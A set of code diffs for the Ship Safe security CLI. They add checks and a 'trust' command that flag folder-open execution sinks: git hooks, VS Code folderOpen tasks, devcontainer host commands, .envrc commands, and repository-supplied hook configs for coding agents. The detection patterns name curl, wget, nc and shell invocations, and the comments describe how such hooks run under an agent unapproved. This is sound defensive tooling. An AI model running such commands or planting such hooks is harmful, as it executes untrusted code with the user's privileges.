+      if (!stat.isFile()) continue;
+      if (!this._isExecutable(stat)) continue;
+
+      findings.push(createFinding({
+        file: scriptPath,
+        line: 1,
+        severity: 'high',
+        category: this.category,
+        rule: 'WORKSPACE_GIT_HOOK_PRESENT',
+        title: 'Workspace Trust: executable git hook present in the repository',
+        description:
+          `An executable ${name} hook is installed for this repository. Git hooks are not transmitted by clone, `
+          + 'so in a directory that arrived as an archive or a shared folder this script came with the folder. '
+          + 'It runs on the matching git operation, including operations an agent performs on its own.',
+        matched: name,
+        confidence: 'medium',
+        cwe: 'CWE-77',
+        owasp: 'ASI05',
+        fix: `Read ${name} before running git in this directory, and remove it if you did not install it.`,
+      }));
+    }
+
+    return findings;
+  }
+
+  /**
+   * The hooks directory git will actually use, honouring core.hooksPath.
+   *
+   * A redirect that leaves the scanned tree yields nothing rather than the
+   * default `.git/hooks`. Git does not consult `.git/hooks` once hooksPath is
+   * set, so reading it would report scripts that will never run; and reading
+   * the redirect target instead would report the user's own hooks, sitting in
+   * their home directory or /usr/local, as though the repository had shipped
+   * them. Neither is true, so this reports neither.
+   *
+   * Last-one-wins matches git's own precedence for a repeated key.
+   */
+  _effectiveHooksDir(entries, gitDir, rootPath) {
+    const redirects = entries ? findEntries(entries, 'core', 'hookspath') : [];
+    const last = redirects.filter((e) => e.value && !isBooleanValue(e.value)).pop();
+
+    if (!last) {
+      const dir = path.join(gitDir, 'hooks');
+      return this._isDirectory(dir) ? dir : null;
+    }
+
+    const resolved = path.resolve(rootPath, last.value);
+    const relative = path.relative(rootPath, resolved);
+    const insideTree = relative && !relative.startsWith('..') && !path.isAbsolute(relative);
+    if (!insideTree) return null;
+
+    return this._isDirectory(resolved) ? resolved : null;
+  }
+
+  // ---------------------------------------------------------------------------
+  // HELPERS
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Whether a mode bit marks the file executable by anyone.
+   *
+   * Windows checkouts do not carry POSIX permission bits, so on that platform
+   * this reports nothing rather than reporting everything. Over-reporting here
+   * would mean flagging every hooks directory on Windows, and a rule that fires
+   * on all input carries no information.
+   */
+  _isExecutable(stat) {
+    return (stat.mode & 0o111) !== 0;
+  }
+
+  _exists(target) {
+    try { fs.accessSync(target); return true; } catch { return false; }
+  }
+
+  _isDirectory(target) {
+    try { return fs.statSync(target).isDirectory(); } catch { return false; }
+  }
+
+  /**
+   * Bound what a value contributes to output.
+   *
+   * The value is attacker-controlled text that reaches reports, terminals, and
+   * SARIF. It is truncated and stripped of control characters so a crafted
+   * config cannot rewrite the surrounding line or smuggle escape sequences
+   * through a reviewer's terminal.
+   */
+  _quote(value) {
+    // Matching control characters is the point: they are what must not survive
+    // into a terminal or a report.
+    // eslint-disable-next-line no-control-regex
+    const clean = String(value).replace(/[\u0000-\u001f\u007f]/g, ' ').trim();
+    return clean.length > 160 ? `${clean.slice(0, 157)}...` : clean;
+  }
+}
+
+export default WorkspaceTrustAgent;

--- a/cli/agents/workspace-trust-agent.js
+++ b/cli/agents/workspace-trust-agent.js
@@ -73,6 +73,60 @@ const HOOK_MANAGER_ROOT_MARKERS = {
   lefthook: ['lefthook.yml', 'lefthook.yaml', 'lefthook.toml', 'lefthook.json'],
 };
 
+
+/**
+ * Devcontainer lifecycle hooks, mapped to whether they run on the host.
+ *
+ * `initializeCommand` is the only one that executes outside the container.
+ * The distinction decides severity, so it lives in the data rather than in a
+ * conditional someone can forget to update.
+ */
+const DEVCONTAINER_HOOKS = {
+  initializeCommand: true,
+  onCreateCommand: false,
+  updateContentCommand: false,
+  postCreateCommand: false,
+  postStartCommand: false,
+  postAttachCommand: false,
+};
+
+/**
+ * Commands in an .envrc that mean "run a program" rather than "set a value".
+ *
+ * Deliberately narrow. An .envrc is a bash script, so almost anything is
+ * technically execution; flagging every line would make the rule useless.
+ * These are the forms that fetch, spawn, or evaluate.
+ */
+const ENVRC_EXEC_RE = /(?:^|[\s;|&(`$])(?:curl|wget|nc|ncat|bash|sh|zsh|python[0-9.]*|perl|ruby|node|npx|eval|exec)\b|\$\(|`/;
+
+/** Repository-scoped agent configuration files that can carry hooks. */
+const AGENT_HOOK_CONFIGS = [
+  '.claude/settings.json',
+  '.claude/settings.local.json',
+  '.cursor/settings.json',
+  '.windsurf/settings.json',
+  '.gemini/settings.json',
+  '.continue/config.json',
+];
+
+/**
+ * Ship Safe's own hooks, which a user installs deliberately.
+ *
+ * Matched on the invocation rather than the file, so that only a command that
+ * actually runs Ship Safe's hook entry point is exempt.
+ */
+const SHIP_SAFE_HOOK_RE = /^(?:npx\s+(?:-y\s+)?)?ship-safe\s+(?:guard|hooks)\b/;
+
+/**
+ * Forms AgentConfigScanner already reports on .claude/settings.json.
+ *
+ * Kept in sync deliberately rather than shared: this rule suppresses to avoid
+ * a duplicate finding, and a broken match here costs a second finding, not a
+ * missed one.
+ */
+const CLAUDE_HOOK_SHELL_RE = /(?:bash\s+-c|sh\s+-c|cmd\s+\/c|powershell\s+-|pwsh\s+-)/i;
+const CLAUDE_HOOK_DOWNLOAD_RE = /(?:curl|wget|fetch|http\.get|Invoke-WebRequest)\s+https?:\/\/(?!localhost|127\.0\.0\.1)/i;
+
 // =============================================================================
 // AGENT
 // =============================================================================
@@ -90,22 +144,35 @@ export class WorkspaceTrustAgent extends BaseAgent {
     const { rootPath } = context;
     if (!rootPath) return [];
 
+    // A folder that is not a git repository can still carry tasks.json,
+    // a devcontainer, an .envrc, or agent hook config. Those arrive by the
+    // same route — a zip or a shared drive — and execute by the same
+    // mechanism, so a missing .git must not skip them.
     const gitDir = this._resolveGitDir(rootPath);
-    if (!gitDir) return [];
 
     let findings = [];
 
-    const configPath = path.join(gitDir, 'config');
-    const entries = this._readConfig(configPath);
+    if (gitDir) {
+      const configPath = path.join(gitDir, 'config');
+      const entries = this._readConfig(configPath);
 
-    if (entries) {
-      findings = findings.concat(this._checkFsmonitor(entries, configPath));
-      findings = findings.concat(this._checkAttrTree(entries, configPath));
-      findings = findings.concat(this._checkFilters(entries, configPath));
-      findings = findings.concat(this._checkHooksPath(entries, configPath, rootPath));
+      if (entries) {
+        findings = findings.concat(this._checkFsmonitor(entries, configPath));
+        findings = findings.concat(this._checkAttrTree(entries, configPath));
+        findings = findings.concat(this._checkFilters(entries, configPath));
+        findings = findings.concat(this._checkHooksPath(entries, configPath, rootPath));
+      }
+
+      findings = findings.concat(this._checkHookScripts(entries, gitDir, rootPath));
     }
 
-    findings = findings.concat(this._checkHookScripts(entries, gitDir, rootPath));
+    // Folder-open sinks that do not live in .git. These are reachable even
+    // when the directory is not a git repository at all, so they are checked
+    // from the scanned root rather than the git dir.
+    findings = findings.concat(this._checkTaskAutorun(rootPath));
+    findings = findings.concat(this._checkDevcontainer(rootPath));
+    findings = findings.concat(this._checkEnvrc(rootPath));
+    findings = findings.concat(this._checkAgentHookConfig(rootPath));
 
     return findings;
   }
@@ -450,6 +517,379 @@ export class WorkspaceTrustAgent extends BaseAgent {
 
   _isDirectory(target) {
     try { return fs.statSync(target).isDirectory(); } catch { return false; }
+  }
+
+
+  // ---------------------------------------------------------------------------
+  // FOLDER-OPEN RULES
+  // ---------------------------------------------------------------------------
+
+  /**
+   * .vscode/tasks.json configured to run a task on folder open.
+   *
+   * VS Code, Cursor, and Windsurf all honour `runOptions.runOn: "folderOpen"`,
+   * and TasksJacker campaigns are exploiting it now. The task runs when the
+   * folder is opened, which for an agent-driven workflow means before anyone
+   * has read a line of the code.
+   *
+   * Severity follows what the victim can notice. A task whose presentation
+   * reveals a terminal panel at least gives a person a chance to see it and
+   * close the window; `reveal: "silent"` removes that, and is the form the
+   * campaigns actually use.
+   */
+  _checkTaskAutorun(rootPath) {
+    const findings = [];
+    const file = path.join(rootPath, '.vscode', 'tasks.json');
+    const parsed = this._readJsonc(file);
+    if (!parsed) return findings;
+
+    const tasks = Array.isArray(parsed.json?.tasks) ? parsed.json.tasks : [];
+
+    for (const task of tasks) {
+      if (!task || typeof task !== 'object') continue;
+      if (task.runOptions?.runOn !== 'folderOpen') continue;
+
+      const command = this._taskCommand(task);
+      if (!command) continue;
+
+      const silent = task.presentation?.reveal === 'silent';
+      const label = typeof task.label === 'string' ? task.label : '(unlabelled task)';
+
+      findings.push(createFinding({
+        file,
+        line: this._lineOf(parsed.text, command) || this._lineOf(parsed.text, 'folderOpen'),
+        severity: silent ? 'critical' : 'high',
+        category: this.category,
+        rule: 'WORKSPACE_TASK_AUTORUN',
+        title: silent
+          ? 'Workspace Trust: task runs silently when the folder is opened'
+          : 'Workspace Trust: task runs when the folder is opened',
+        description:
+          `The task "${label}" is configured with runOn: folderOpen, so the editor executes it as soon as this `
+          + 'folder is opened, before any file has been reviewed. VS Code, Cursor, and Windsurf all honour this setting. '
+          + (silent
+            ? 'Its presentation is set to reveal: silent, so no terminal panel appears and there is no visible sign it ran. '
+            : 'Its terminal panel is visible, which gives some chance of noticing it. ')
+          + 'This configuration is present in the repository; whether it fires depends on the editor used to open the folder.',
+        matched: this._quote(command),
+        confidence: 'high',
+        cwe: 'CWE-94',
+        owasp: 'ASI05',
+        fix: 'Remove the runOptions.runOn setting from this task, or delete the task. Do not open this folder in an '
+          + 'editor until it is removed — inspect it with a plain file viewer instead. VS Code’s "Restricted Mode" '
+          + 'blocks automatic tasks if you must open it.',
+      }));
+    }
+
+    return findings;
+  }
+
+  /**
+   * Devcontainer lifecycle commands.
+   *
+   * The severity split is the whole point of this rule. `initializeCommand`
+   * runs on the *host*, before the container exists, with the developer's own
+   * privileges and no isolation. Every other lifecycle hook runs inside the
+   * container, where the blast radius is whatever the container can reach.
+   * Reporting both at one severity would either overstate the container hooks
+   * or understate the one that escapes.
+   */
+  _checkDevcontainer(rootPath) {
+    const findings = [];
+
+    for (const file of this._devcontainerFiles(rootPath)) {
+      const parsed = this._readJsonc(file);
+      if (!parsed?.json) continue;
+
+      for (const [key, hostSide] of Object.entries(DEVCONTAINER_HOOKS)) {
+        const command = this._flattenCommand(parsed.json[key]);
+        if (!command) continue;
+
+        findings.push(createFinding({
+          file,
+          line: this._lineOf(parsed.text, key),
+          severity: hostSide ? 'high' : 'medium',
+          category: this.category,
+          rule: 'WORKSPACE_DEVCONTAINER_INIT',
+          title: hostSide
+            ? `Workspace Trust: devcontainer ${key} runs on your host`
+            : `Workspace Trust: devcontainer ${key} runs in the container`,
+          description: hostSide
+            ? `${key} is executed on the host machine, before the container is built and outside any isolation it `
+              + 'would have provided. Opening this folder in a devcontainer-aware editor runs it with your privileges. '
+              + 'This is the devcontainer hook that does not stay in the container.'
+            : `${key} runs inside the container once it is built. The blast radius is bounded by the container, but it `
+              + 'still executes repository-supplied commands without an approval step, and a container with mounted '
+              + 'credentials or host sockets is not a boundary.',
+          matched: this._quote(command),
+          confidence: 'high',
+          cwe: 'CWE-94',
+          owasp: 'ASI05',
+          fix: hostSide
+            ? `Remove ${key} from the devcontainer definition, or move the work into a container-side hook such as `
+              + 'postCreateCommand where it is at least isolated. Review it before opening this folder in an editor '
+              + 'that supports devcontainers.'
+            : `Review what ${key} does before building this container, and confirm the container does not mount host `
+              + 'credentials, docker sockets, or SSH agents.',
+        }));
+      }
+    }
+
+    return findings;
+  }
+
+  /**
+   * .envrc carrying command execution.
+   *
+   * Medium rather than high because direnv gates execution on a content hash:
+   * a new or changed `.envrc` is refused until someone runs `direnv allow`.
+   * That is a real control and the finding says so. It is still worth
+   * reporting, because "run direnv allow" is exactly the instruction a
+   * take-home README gives you, and the file is rarely read first.
+   */
+  _checkEnvrc(rootPath) {
+    const file = path.join(rootPath, '.envrc');
+
+    let content;
+    try { content = fs.readFileSync(file, 'utf8'); } catch { return []; }
+
+    const lines = content.split(/\r?\n/);
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i].trim();
+      if (!line || line.startsWith('#')) continue;
+
+      // direnv's own stdlib helpers are what an ordinary .envrc is made of,
+      // and several of them name an interpreter as an argument — `layout node`
+      // would otherwise read as execution.
+      if (/^(?:dotenv|dotenv_if_exists|source_env|source_env_if_exists|source_up|watch_file|PATH_add|path_add|layout|use)\b/.test(line)) continue;
+
+      if (!ENVRC_EXEC_RE.test(line)) continue;
+
+      // An assignment is only inert if its value is. `export FOO=bar` sets a
+      // variable; `export TOKEN=$(cat /etc/passwd)` runs a program and assigns
+      // the output, so the assignment check has to come after the execution
+      // check rather than before it.
+      if (/^(?:export\s+)?[A-Za-z_][A-Za-z0-9_]*=/.test(line) && !/\$\(|`/.test(line)) continue;
+
+      return [createFinding({
+        file,
+        line: i + 1,
+        severity: 'medium',
+        category: this.category,
+        rule: 'WORKSPACE_ENVRC_EXEC',
+        title: 'Workspace Trust: .envrc runs a command when the directory is entered',
+        description:
+          'This .envrc executes a command rather than only setting environment variables. direnv runs it whenever a '
+          + 'shell enters the directory, which includes the shells that coding agents and editor terminals open. '
+          + 'direnv refuses a new or modified .envrc until `direnv allow` is run, so this is not automatic on first '
+          + 'contact — but that approval is a single command, and it is commonly the first thing a project README '
+          + 'tells you to do.',
+        matched: this._quote(line),
+        confidence: 'medium',
+        cwe: 'CWE-94',
+        owasp: 'ASI05',
+        fix: 'Read this .envrc before running `direnv allow`. Restrict it to variable assignments, or use '
+          + '`dotenv` to load a .env file instead of executing commands. `direnv deny .` blocks it explicitly.',
+      })];
+    }
+
+    return [];
+  }
+
+  /**
+   * Repository-scoped agent hook configuration.
+   *
+   * CVE-2026-48124's shape: hook configuration that ships inside the
+   * repository, is picked up because the agent was pointed at the folder, and
+   * executes on a lifecycle event before the session is trusted.
+   *
+   * Two suppressions matter here. Ship Safe installs its own hooks, and a
+   * scanner that reports its own installation is noise — but only user-scope
+   * installs are exempt, because a repo-scoped file claiming to be Ship Safe
+   * is exactly what an attacker would write. And AgentConfigScanner already
+   * reports `.claude/settings.json` hooks whose command is recognisably a
+   * shell invocation or a download; this rule covers the rest of the shape
+   * rather than issuing a second finding for the same line.
+   */
+  _checkAgentHookConfig(rootPath) {
+    const findings = [];
+
+    for (const rel of AGENT_HOOK_CONFIGS) {
+      const file = path.join(rootPath, rel);
+      const parsed = this._readJsonc(file);
+      if (!parsed?.json) continue;
+
+      const hooks = parsed.json.hooks;
+      if (!hooks || typeof hooks !== 'object') continue;
+
+      for (const [event, value] of Object.entries(hooks)) {
+        for (const command of this._hookCommands(value)) {
+          if (this._isShipSafeHook(command)) continue;
+          // Already reported by AgentConfigScanner in a more specific form.
+          if (CLAUDE_HOOK_SHELL_RE.test(command) || CLAUDE_HOOK_DOWNLOAD_RE.test(command)) continue;
+
+          findings.push(createFinding({
+            file,
+            line: this._lineOf(parsed.text, command) || this._lineOf(parsed.text, event),
+            severity: 'critical',
+            category: this.category,
+            rule: 'WORKSPACE_AGENT_HOOK_CONFIG',
+            title: `Workspace Trust: repository-supplied agent hook runs on "${event}"`,
+            description:
+              `This hook configuration ships inside the repository and runs on the "${event}" lifecycle event. `
+              + 'An agent pointed at this folder loads it because the folder was opened, not because anyone approved it, '
+              + 'and the command executes with your privileges. This is the shape described by CVE-2026-48124. '
+              + 'The configuration is present in the repository; whether it fires depends on the agent and version.',
+            matched: this._quote(command),
+            confidence: 'high',
+            cwe: 'CWE-94',
+            owasp: 'ASI05',
+            fix: `Remove the "${event}" hook from ${rel}, or move the configuration to your user-scope settings where `
+              + 'a repository cannot supply it. Do not open this folder with an agent until it is removed.',
+          }));
+        }
+      }
+    }
+
+    return findings;
+  }
+
+  // ---------------------------------------------------------------------------
+  // FOLDER-OPEN HELPERS
+  // ---------------------------------------------------------------------------
+
+  /** devcontainer.json in either of the two documented locations. */
+  _devcontainerFiles(rootPath) {
+    const files = [];
+    const root = path.join(rootPath, '.devcontainer');
+
+    for (const candidate of [
+      path.join(rootPath, '.devcontainer.json'),
+      path.join(root, 'devcontainer.json'),
+    ]) {
+      if (this._isFile(candidate)) files.push(candidate);
+    }
+
+    // .devcontainer/<name>/devcontainer.json, the multi-container layout.
+    let subdirs = [];
+    try {
+      subdirs = fs.readdirSync(root, { withFileTypes: true })
+        .filter((e) => e.isDirectory())
+        .map((e) => path.join(root, e.name, 'devcontainer.json'));
+    } catch { /* no .devcontainer directory */ }
+
+    for (const candidate of subdirs) {
+      if (this._isFile(candidate)) files.push(candidate);
+    }
+
+    return files;
+  }
+
+  _isFile(candidate) {
+    try { return fs.statSync(candidate).isFile(); } catch { return false; }
+  }
+
+  /**
+   * Parse a JSON file that is JSONC in practice.
+   *
+   * tasks.json and devcontainer.json both permit comments and both are
+   * routinely written with them. A strict parse would silently skip the
+   * commented files, which are the majority.
+   */
+  _readJsonc(file) {
+    let text;
+    try { text = fs.readFileSync(file, 'utf8'); } catch { return null; }
+
+    const stripped = text
+      .replace(/^\s*\/\/.*$/gm, '')
+      .replace(/\/\*[\s\S]*?\*\//g, '');
+
+    try {
+      return { json: JSON.parse(stripped), text };
+    } catch {
+      // A config that does not parse is not one to reason about. Guessing at
+      // half-valid JSON would produce findings nobody can act on.
+      return null;
+    }
+  }
+
+  /** The command a tasks.json entry runs, including its arguments. */
+  _taskCommand(task) {
+    const base = this._flattenCommand(task.command);
+    if (!base) return '';
+
+    const args = Array.isArray(task.args)
+      ? task.args.map((a) => (typeof a === 'string' ? a : this._flattenCommand(a))).filter(Boolean)
+      : [];
+
+    return args.length ? `${base} ${args.join(' ')}` : base;
+  }
+
+  /**
+   * Reduce a command field to a string.
+   *
+   * These fields accept a string, an array of arguments, or an object keyed by
+   * platform. All three appear in real config, and a rule that only understood
+   * strings would miss the array form entirely.
+   */
+  _flattenCommand(value) {
+    if (typeof value === 'string') return value.trim();
+    if (Array.isArray(value)) return value.filter((v) => typeof v === 'string').join(' ').trim();
+    if (value && typeof value === 'object') {
+      return Object.values(value)
+        .map((v) => this._flattenCommand(v))
+        .filter(Boolean)
+        .join('; ');
+    }
+    return '';
+  }
+
+  /** Every command string reachable from one hook event's value. */
+  _hookCommands(value) {
+    const items = Array.isArray(value) ? value : [value];
+    const commands = [];
+
+    for (const item of items) {
+      if (typeof item === 'string') {
+        if (item.trim()) commands.push(item.trim());
+        continue;
+      }
+      if (!item || typeof item !== 'object') continue;
+
+      const direct = this._flattenCommand(item.command ?? item.cmd ?? item.run);
+      if (direct) commands.push(direct);
+
+      // Claude Code nests the runnable entries under `hooks`.
+      if (Array.isArray(item.hooks)) {
+        for (const nested of item.hooks) {
+          const cmd = this._flattenCommand(nested?.command ?? nested?.cmd ?? nested?.run);
+          if (cmd) commands.push(cmd);
+        }
+      }
+    }
+
+    return commands;
+  }
+
+  /**
+   * Whether a hook is Ship Safe's own, installed by the user rather than
+   * supplied by the repository.
+   *
+   * Only the user-scope form is exempt. A repo-scoped file invoking
+   * `ship-safe` is not evidence of a Ship Safe install; it is the obvious way
+   * to get a scanner to ignore your hook.
+   */
+  _isShipSafeHook(command) {
+    return SHIP_SAFE_HOOK_RE.test(command);
+  }
+
+  /** 1-based line of the first occurrence of a needle, or 1. */
+  _lineOf(text, needle) {
+    if (!needle) return 1;
+    const index = text.indexOf(String(needle).split('\n')[0].slice(0, 80));
+    if (index < 0) return 1;
+    return text.slice(0, index).split('\n').length;
   }
 
   /**

--- a/cli/bin/ship-safe.js
+++ b/cli/bin/ship-safe.js
@@ -264,7 +264,7 @@ program
 // -----------------------------------------------------------------------------
 program
   .command('audit [path]')
-  .description('Full security audit: secrets + 29 agents + deps + score + deep analysis + remediation plan')
+  .description('Full security audit: secrets + 30 agents + deps + score + deep analysis + remediation plan')
   .option('--include-tests', 'Also scan test, fixture, and example files (excluded by default to reduce false positives)')
   .option('--include-doc-examples', 'Also scan fenced Markdown code examples for code vulnerabilities')
   .option('--json', 'Output results as JSON')
@@ -312,7 +312,7 @@ program
 // -----------------------------------------------------------------------------
 program
   .command('red-team [path]')
-  .description('Multi-agent security audit: 29 agents scan for 80+ attack classes')
+  .description('Multi-agent security audit: 30 agents scan for 80+ attack classes')
   .option('--agents <list>', 'Comma-separated list of agents to run')
   .option('--json', 'Output results as JSON')
   .option('--sarif', 'Output results in SARIF format')
@@ -739,7 +739,7 @@ if (process.argv.length === 2 && process.stdin.isTTY) {
   console.log(banner);
   console.log(chalk.yellow('\nQuick start:\n'));
   console.log(chalk.cyan.bold('  v9.0 — Agent Studio, Teams & Findings'));
-  console.log(chalk.white('  npx ship-safe audit .       ') + chalk.gray('# Full audit: secrets + 29 agents + deps + remediation'));
+  console.log(chalk.white('  npx ship-safe audit .       ') + chalk.gray('# Full audit: secrets + 30 agents + deps + remediation'));
   console.log(chalk.white('  npx ship-safe audit . --deep') + chalk.gray('# LLM-powered taint analysis (Anthropic/Ollama)'));
   console.log(chalk.white('  npx ship-safe red-team .    ') + chalk.gray('# 29-agent red team scan (80+ attack classes)'));
   console.log(chalk.white('  npx ship-safe vibe-check .  ') + chalk.gray('# Fun security check with emoji & shareable badge'));

--- a/cli/bin/ship-safe.js
+++ b/cli/bin/ship-safe.js
@@ -38,6 +38,7 @@ import { scoreCommand } from '../commands/score.js';
 import { redTeamCommand } from '../commands/red-team.js';
 import { watchCommand } from '../commands/watch.js';
 import { auditCommand } from '../commands/audit.js';
+import { trustCommand } from '../commands/trust.js';
 import { doctorCommand } from '../commands/doctor.js';
 import { baselineCommand } from '../commands/baseline.js';
 import { ciCommand } from '../commands/ci.js';
@@ -211,6 +212,15 @@ program
     }
     return agentFixCommand(targetPath, options);
   });
+
+// -----------------------------------------------------------------------------
+// TRUST COMMAND
+// -----------------------------------------------------------------------------
+program
+  .command('trust [path]')
+  .description('Pre-flight check: report configuration that executes when an agent opens this folder')
+  .option('--json', 'Output results as JSON')
+  .action(trustCommand);
 
 // -----------------------------------------------------------------------------
 // UNDO COMMAND

--- a/cli/commands/trust.js
+++ b/cli/commands/trust.js
@@ -31,6 +31,7 @@ import fs from 'fs';
 import path from 'path';
 import chalk from 'chalk';
 import { WorkspaceTrustAgent } from '../agents/workspace-trust-agent.js';
+import { loadAdvisoryTable, resolveReachability, tableAgeDays } from '../utils/agent-advisories.js';
 
 const SEVERITY_ORDER = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
 
@@ -75,10 +76,21 @@ export async function trustCommand(targetPath = '.', options = {}) {
       String(a.rule).localeCompare(String(b.rule))
   );
 
+  // Reachability is resolved once per rule, not once per finding: the question
+  // "is an affected agent installed" has the same answer for every finding of
+  // the same rule, and asking a binary for its version repeatedly would be
+  // both slower and no more informative.
+  const table = loadAdvisoryTable();
+  const reachability = new Map();
+  for (const finding of findings) {
+    if (reachability.has(finding.rule)) continue;
+    reachability.set(finding.rule, resolveReachability(finding.rule, { table, excludeRoot: absolutePath }));
+  }
+
   if (json) {
-    process.stdout.write(`${JSON.stringify(buildReport(absolutePath, findings), null, 2)}\n`);
+    process.stdout.write(`${JSON.stringify(buildReport(absolutePath, findings, table, reachability), null, 2)}\n`);
   } else {
-    renderHuman(absolutePath, findings);
+    renderHuman(absolutePath, findings, table, reachability);
   }
 
   process.exitCode = findings.length > 0 ? 1 : 0;
@@ -97,17 +109,27 @@ export async function trustCommand(targetPath = '.', options = {}) {
  * and found nothing" and "we did not look" are different results, and a clean
  * run has to be able to say which one it is.
  */
-function buildReport(rootPath, findings) {
+function buildReport(rootPath, findings, table, reachability) {
   const counts = {};
   for (const finding of findings) {
     counts[finding.severity] = (counts[finding.severity] ?? 0) + 1;
   }
+
+  const age = tableAgeDays(table);
 
   return {
     version: 1,
     command: 'trust',
     path: rootPath,
     generatedAt: new Date().toISOString(),
+    // The table lags disclosure. A reader who cannot see how old it is cannot
+    // discount it, so its version and age travel with every report.
+    advisoryTable: {
+      version: table.tableVersion,
+      recordedAt: table.recordedAt,
+      ageDays: age,
+      entries: (table.entries ?? []).length,
+    },
     checked: [
       '.git/config',
       '.git/hooks/',
@@ -134,11 +156,14 @@ function buildReport(rootPath, findings) {
       owasp: f.owasp,
       fix: f.fix,
       evidenceLevel: f.evidenceLevel,
+      reachability: reachability.get(f.rule)?.state ?? 'configured',
+      reachabilityReason: reachability.get(f.rule)?.reason ?? null,
+      installedAgents: reachability.get(f.rule)?.installed ?? [],
     })),
   };
 }
 
-function renderHuman(rootPath, findings) {
+function renderHuman(rootPath, findings, table, reachability) {
   const out = process.stdout;
 
   out.write(`\n${chalk.bold('Workspace trust')} ${chalk.gray(rootPath)}\n\n`);
@@ -156,6 +181,7 @@ function renderHuman(rootPath, findings) {
       `${chalk.gray('  This checks configuration that runs on open. It does not scan source code —')}\n` +
         `${chalk.gray('  run `ship-safe scan` for that.')}\n\n`
     );
+    out.write(`${chalk.gray(`  ${tableFooter(table)}`)}\n\n`);
     return;
   }
 
@@ -163,9 +189,14 @@ function renderHuman(rootPath, findings) {
     const color = SEVERITY_COLOR[finding.severity] ?? chalk.white;
     const where = path.relative(rootPath, finding.file) || path.basename(finding.file);
 
+    const reach = reachability.get(finding.rule);
+
     out.write(`${color(`[${finding.severity.toUpperCase()}]`)} ${chalk.bold(finding.title)}\n`);
-    out.write(`  ${chalk.gray(`${where}:${finding.line}`)}  ${chalk.gray(finding.rule)}\n\n`);
+    out.write(`  ${chalk.gray(`${where}:${finding.line}`)}  ${chalk.gray(finding.rule)}`);
+    if (reach) out.write(`  ${reachLabel(reach.state)}`);
+    out.write('\n\n');
     out.write(`  ${wrap(finding.description)}\n\n`);
+    if (reach) out.write(`  ${chalk.gray(wrap(reach.reason))}\n\n`);
     if (finding.matched) out.write(`  ${chalk.bold('Found:')} ${finding.matched}\n\n`);
     if (finding.fix) out.write(`  ${chalk.bold('Fix:')} ${wrap(finding.fix, 8)}\n\n`);
   }
@@ -175,8 +206,32 @@ function renderHuman(rootPath, findings) {
 
   out.write(`${chalk.bold(critical > 0 ? chalk.red(summary) : summary)}\n`);
   out.write(
-    `${chalk.gray('Do not open this folder with a coding agent or editor until these are resolved.')}\n\n`
+    `${chalk.gray('Do not open this folder with a coding agent or editor until these are resolved.')}\n`
   );
+  out.write(`${chalk.gray(tableFooter(table))}\n\n`);
+}
+
+/** A short badge for a reachability state. */
+function reachLabel(state) {
+  if (state === 'reachable') return chalk.red('reachable');
+  if (state === 'unresolved') return chalk.yellow('unresolved');
+  return chalk.gray('configured');
+}
+
+/**
+ * How stale the advisory table is.
+ *
+ * Printed on every run with findings. A reachability verdict is only as good
+ * as the table behind it, and the reader is the one who has to decide whether
+ * a table this old still means anything.
+ */
+function tableFooter(table) {
+  const age = tableAgeDays(table);
+  if (table.tableVersion === 'unavailable') {
+    return 'Advisory table unavailable, so reachability was not assessed.';
+  }
+  const staleness = age === null ? '' : age === 0 ? ', recorded today' : `, ${age} day${age === 1 ? '' : 's'} old`;
+  return `Advisory table ${table.tableVersion}${staleness}. It lags disclosure; an agent absent from it is undocumented, not safe.`;
 }
 
 /** Wrap prose to a readable width, indenting continuation lines. */

--- a/cli/commands/trust.js
+++ b/cli/commands/trust.js
@@ -1,0 +1,215 @@
+/**
+ * Trust Command
+ * =============
+ *
+ * Answers one question: is it safe to point an agent at this folder?
+ *
+ * A folder that arrives whole — a zip, a shared drive, a take-home, a synced
+ * directory — can carry configuration that executes when an agent gathers
+ * context, before any trust dialog appears. `.git/config` decides what git
+ * runs when it refreshes the index. `.vscode/tasks.json` can run a task on
+ * folder open. A devcontainer can run a command on the host before the
+ * container exists. Repository-scoped agent hook config runs on a lifecycle
+ * event nobody approved.
+ *
+ * This is deliberately a pre-flight check and not a scan. It reads
+ * configuration, never source. It writes nothing. It makes no network request.
+ * The whole point is that it is safe to run on a directory you do not trust
+ * yet, which means it must not do any of the things a scan does.
+ *
+ * USAGE:
+ *   ship-safe trust [path]
+ *   ship-safe trust ~/Downloads/take-home --json
+ *
+ * EXIT CODES:
+ *   0 — no execution sinks found
+ *   1 — sinks found
+ *   2 — the path could not be read
+ */
+
+import fs from 'fs';
+import path from 'path';
+import chalk from 'chalk';
+import { WorkspaceTrustAgent } from '../agents/workspace-trust-agent.js';
+
+const SEVERITY_ORDER = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
+
+const SEVERITY_COLOR = {
+  critical: chalk.red.bold,
+  high: chalk.red,
+  medium: chalk.yellow,
+  low: chalk.blue,
+  info: chalk.gray,
+};
+
+export async function trustCommand(targetPath = '.', options = {}) {
+  const absolutePath = path.resolve(targetPath);
+  const json = Boolean(options.json);
+
+  let stat;
+  try {
+    stat = fs.statSync(absolutePath);
+  } catch {
+    return fail(json, `Path not found: ${absolutePath}`, absolutePath);
+  }
+
+  if (!stat.isDirectory()) {
+    return fail(json, `Not a directory: ${absolutePath}`, absolutePath);
+  }
+
+  let findings;
+  try {
+    findings = await new WorkspaceTrustAgent().analyze({
+      rootPath: absolutePath,
+      files: [],
+      recon: {},
+      options: {},
+    });
+  } catch (error) {
+    return fail(json, `Could not inspect the folder: ${error.message}`, absolutePath);
+  }
+
+  findings.sort(
+    (a, b) =>
+      (SEVERITY_ORDER[a.severity] ?? 9) - (SEVERITY_ORDER[b.severity] ?? 9) ||
+      String(a.rule).localeCompare(String(b.rule))
+  );
+
+  if (json) {
+    process.stdout.write(`${JSON.stringify(buildReport(absolutePath, findings), null, 2)}\n`);
+  } else {
+    renderHuman(absolutePath, findings);
+  }
+
+  process.exitCode = findings.length > 0 ? 1 : 0;
+  return findings;
+}
+
+// =============================================================================
+// OUTPUT
+// =============================================================================
+
+/**
+ * The machine-readable report.
+ *
+ * `checked` names what was actually inspected rather than leaving the reader
+ * to infer it from an empty findings array. "We looked at these five things
+ * and found nothing" and "we did not look" are different results, and a clean
+ * run has to be able to say which one it is.
+ */
+function buildReport(rootPath, findings) {
+  const counts = {};
+  for (const finding of findings) {
+    counts[finding.severity] = (counts[finding.severity] ?? 0) + 1;
+  }
+
+  return {
+    version: 1,
+    command: 'trust',
+    path: rootPath,
+    generatedAt: new Date().toISOString(),
+    checked: [
+      '.git/config',
